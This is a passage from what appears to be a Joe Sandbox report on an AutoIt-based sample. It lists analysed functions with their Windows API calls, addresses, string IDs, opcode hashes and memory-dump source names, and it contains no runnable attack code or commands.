                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                        • String ID: pM5
                                        • API String ID: 3311320906-3100918825
                                        • Opcode ID: d3c72d75f6088c840f009ce051a69385643373a391b8edccefad98d1724b2039
                                        • Instruction ID: 43bca4cecb2ae7c8ae71f3ef916c7648f2053e061c82b48210b9422fedbd8291
                                        • Opcode Fuzzy Hash: d3c72d75f6088c840f009ce051a69385643373a391b8edccefad98d1724b2039
                                        • Instruction Fuzzy Hash: D7411F71900B059ED73A8F28D891B7B77E8EB45330F15861EE8AA8F6D1E774F8408B50
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0038A668
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0038A67D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 02359af4705aeadf8b4ba5fc2ea699d6a992835f8f7aa48286074b72b7f41691
                                        • Instruction ID: 685be5e6fc4df005bb5202f68490aa5301313d255327047794ea53b5a9de9029
                                        • Opcode Fuzzy Hash: 02359af4705aeadf8b4ba5fc2ea699d6a992835f8f7aa48286074b72b7f41691
                                        • Instruction Fuzzy Hash: 07411875A00709DFEB15DF68D880BDA7BB9FB09300F1501AAE945EB385E770A941CFA1
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 0038961B
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00389657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: d4b4fd2cd0de1b87ad61c85610d3c13520221a0fa94efc98674df760e882baa6
                                        • Instruction ID: ddba01d3a01676707256662c43dd97754057959f51c6ca56b81fdb113c5876bc
                                        • Opcode Fuzzy Hash: d4b4fd2cd0de1b87ad61c85610d3c13520221a0fa94efc98674df760e882baa6
                                        • Instruction Fuzzy Hash: EB319031500604AEEB12AF74DC81BFB77ADFF49764F15851AF8A9C7190DA319C81D760
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D0ED
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D127
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: bf040fafb3bd37d404c888d44d28689c80d9f6c8d47c910c82fa5b85010ef184
                                        • Instruction ID: ce8b6102dbd1f8a330f7f51d69ff614580be0f40dcbcf0fdfdaa3ffc7e98eaf7
                                        • Opcode Fuzzy Hash: bf040fafb3bd37d404c888d44d28689c80d9f6c8d47c910c82fa5b85010ef184
                                        • Instruction Fuzzy Hash: 5721E972D00615ABCB23EF94D881DEEB779EF88701F128029ED05AB2A0EB705D05C790
                                        APIs
                                        • _memset.LIBCMT ref: 00365BE4
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00365C1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: e9f6f4874cf918d6faa78473187ba5583733c157554d696cd742f138651554f5
                                        • Instruction ID: 3c4dfb8eb86e707a5948989b916603248b497741d7e0b1f7a645221ba2fceffd
                                        • Opcode Fuzzy Hash: e9f6f4874cf918d6faa78473187ba5583733c157554d696cd742f138651554f5
                                        • Instruction Fuzzy Hash: 0231B971600709EBDB26CF99C989BADBBF8EF05350F198039E9819B1A4D7709944DF50
                                        APIs
                                        • __snwprintf.LIBCMT ref: 00376BDD
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __snwprintf_memmove
                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                        • API String ID: 3506404897-2584243854
                                        • Opcode ID: 473e87c4ab21781855b7b2b5248218fb5e28c5bee437d4ec0bf0749a19f8ab34
                                        • Instruction ID: 851ad4a24c9f22860d3a62599cb72ea191ed2724aa9af602f14266ed62893a72
                                        • Opcode Fuzzy Hash: 473e87c4ab21781855b7b2b5248218fb5e28c5bee437d4ec0bf0749a19f8ab34
                                        • Instruction Fuzzy Hash: 1821BF32600529AACF13EF94D892EEE77B5EF45700F104465F509AB282DB74EE41CBA2
                                        APIs
                                          • Part of subcall function 003686AE: GetLocalTime.KERNEL32 ref: 003686BB
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 003686F0
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368722
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368755
                                          • Part of subcall function 003686AE: _wcsncpy.LIBCMT ref: 00368797
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00389405
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalMessageSendTime
                                        • String ID: @U=u$SysDateTimePick32
                                        • API String ID: 2466184910-2530228043
                                        • Opcode ID: a5c0f37a31ce135fecd524a216c6dda073d3ee9b2541ec6852775496379e417f
                                        • Instruction ID: 9abdebc396879f0919e7d9300dfb3d096a83c2f688bec80ba2d60fe09a261585
                                        • Opcode Fuzzy Hash: a5c0f37a31ce135fecd524a216c6dda073d3ee9b2541ec6852775496379e417f
                                        • Instruction Fuzzy Hash: F621E4323503046BEF239E54DC82FFE3369EB54750F25451AF951AB1D0C6B1AC818B60
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0035C9A6
                                          • Part of subcall function 00364C65: GetWindowThreadProcessId.USER32(?,?), ref: 00364C90
                                          • Part of subcall function 00364C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CA0
                                          • Part of subcall function 00364C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CB6
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0035CA0D
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @U=u
                                        • API String ID: 1045663743-2594219639
                                        • Opcode ID: ba770c425f2fc4fd8cd7c19a2294a51d9f9ff7b31ce73fe57a5401398c2d86ba
                                        • Instruction ID: 629b8e4dc2d94d7c6e4c9c7a961ce20fa1aa4dae667803870662b34a093c6ed1
                                        • Opcode Fuzzy Hash: ba770c425f2fc4fd8cd7c19a2294a51d9f9ff7b31ce73fe57a5401398c2d86ba
                                        • Instruction Fuzzy Hash: 72217131D01228AFDF22DFA4DC85FDDBBB8FF05754F1081A5E945AB1A1EA705A44CB90
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00389269
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00389274
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: c66ed4602f86b0a88a2fcc66312c1db7aaa2c26ea85a4f9a92fa51ea6677bccc
                                        • Instruction ID: 208433578521c8bea975dd292d34289d0c20aa48c51cc39d803d10b533fd872d
                                        • Opcode Fuzzy Hash: c66ed4602f86b0a88a2fcc66312c1db7aaa2c26ea85a4f9a92fa51ea6677bccc
                                        • Instruction Fuzzy Hash: EC11B67130020CBFEF129E54DC81FBB376EEB893A4F154566F9189B290D631DC5187A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @U=u
                                        • API String ID: 0-2594219639
                                        • Opcode ID: 1660ef247541927ccf7141b7278fa3d02c7c5f3f0f606f62ad6112cb8b27a536
                                        • Instruction ID: de16be726e5d353980a3e668faf4f0e4b1613149dd44ef52f35258e29098fb63
                                        • Opcode Fuzzy Hash: 1660ef247541927ccf7141b7278fa3d02c7c5f3f0f606f62ad6112cb8b27a536
                                        • Instruction Fuzzy Hash: 2211E231120308BFEF16AF98CC01FF937A8EB05750F115995FA16AA0D0D2B0DA10EB30
                                        APIs
                                          • Part of subcall function 0033C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0033C657
                                          • Part of subcall function 0033C619: GetStockObject.GDI32(00000011), ref: 0033C66B
                                          • Part of subcall function 0033C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0033C675
                                        • GetWindowRect.USER32(00000000,?), ref: 00389775
                                        • GetSysColor.USER32(00000012), ref: 0038978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: 657cb95297d723c6d39445050981a67de60dc487904437bb69f7a0021ba1efb8
                                        • Instruction ID: 6ed1680a62fece25db4d4160893087e749ff74e00315c2a15a74d4cfd88957f3
                                        • Opcode Fuzzy Hash: 657cb95297d723c6d39445050981a67de60dc487904437bb69f7a0021ba1efb8
                                        • Instruction Fuzzy Hash: 5D116A72520209AFDB06EFB8DC45EFA7BB8EB49304F050569F956E3240D735E851DB50
                                        APIs
                                        • SendMessageW.USER32(?,?,?,?), ref: 0038B03B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 8719e87d2d7cd01e28fc999b5c0396541ed2556a741d480aa2104ba61bc0e7df
                                        • Instruction ID: 781034fb6419cbccc3091567ceb9c4dd7e74bfd340bb8eb86a55e11a3ba52d60
                                        • Opcode Fuzzy Hash: 8719e87d2d7cd01e28fc999b5c0396541ed2556a741d480aa2104ba61bc0e7df
                                        • Instruction Fuzzy Hash: 6E21B3BA60021AEFCB1ADF94D840CEEBBB9FB4D340B014595FD16A7360D731A951DBA0
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0037544C
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00375475
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 94447d67ec85f4035f12163e9ab05ca6816763eaa14020965b6d0bcafd85dc1d
                                        • Instruction ID: eae6587e31b2d8decb80c7bc9ab1867c1d0259da6173f32197a534a9d4d0ff7d
                                        • Opcode Fuzzy Hash: 94447d67ec85f4035f12163e9ab05ca6816763eaa14020965b6d0bcafd85dc1d
                                        • Instruction Fuzzy Hash: AF11A370141A21BADB3A8F528C84EFBFB6CFF16752F10C12AF54956440E3B85980C6F0
                                        APIs
                                        • SendMessageW.USER32(?,00000401,?,00000000), ref: 00389134
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u$button
                                        • API String ID: 3850602802-1762282863
                                        • Opcode ID: a57a69fd72a7fcc0769772cf0d5696cddd0fa5a896e8d4b2efdaf9fe50ded556
                                        • Instruction ID: bea248213e3dd3ef356c41f6c05dfd98b97238f79ea67245aee741ae46e20867
                                        • Opcode Fuzzy Hash: a57a69fd72a7fcc0769772cf0d5696cddd0fa5a896e8d4b2efdaf9fe50ded556
                                        • Instruction Fuzzy Hash: 4D112532250205ABDF129F60DC45FFA376AFF18314F154515FA85A7290C276E8609B50
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00354557
                                        • ___raise_securityfailure.LIBCMT ref: 0035463E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                        • String ID: (>
                                        • API String ID: 3761405300-3184569772
                                        • Opcode ID: b467787117b54bece7dc220d95e51280d360247ac8a1dff3472f6482fcb1bd2f
                                        • Instruction ID: 3863188577ac5639bbf0f65d578fceb427b1f15b0919ec1bbca02a45f2ade450
                                        • Opcode Fuzzy Hash: b467787117b54bece7dc220d95e51280d360247ac8a1dff3472f6482fcb1bd2f
                                        • Instruction Fuzzy Hash: 6721F6B55017849AD32ADF65FED16517BB8BB88314F105A2AE5048E2E0E3F469C0CB85
                                        APIs
                                        • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0038A3E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 3320c2ed87272f8dac591d0cba352f9891e3d0544a79657b5e40c8338b048fdc
                                        • Instruction ID: 9eb1231dea4ca106b1d7f20bc7eb14ebfb64e753130bc8a73f3da3ce778ac4c2
                                        • Opcode Fuzzy Hash: 3320c2ed87272f8dac591d0cba352f9891e3d0544a79657b5e40c8338b048fdc
                                        • Instruction Fuzzy Hash: 9A112230500B40AFEB22DF34C895AE7BBE9BF06300F10854EE8AB97381D7B06901DB61
                                        APIs
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0035CC85
                                        • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0035CCA8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$MemoryProcessWrite
                                        • String ID: @U=u
                                        • API String ID: 1195347164-2594219639
                                        • Opcode ID: 0542bdeadbedc7ca6382a3521bc054796111a75b298956a907f6a74a8bcbb0c4
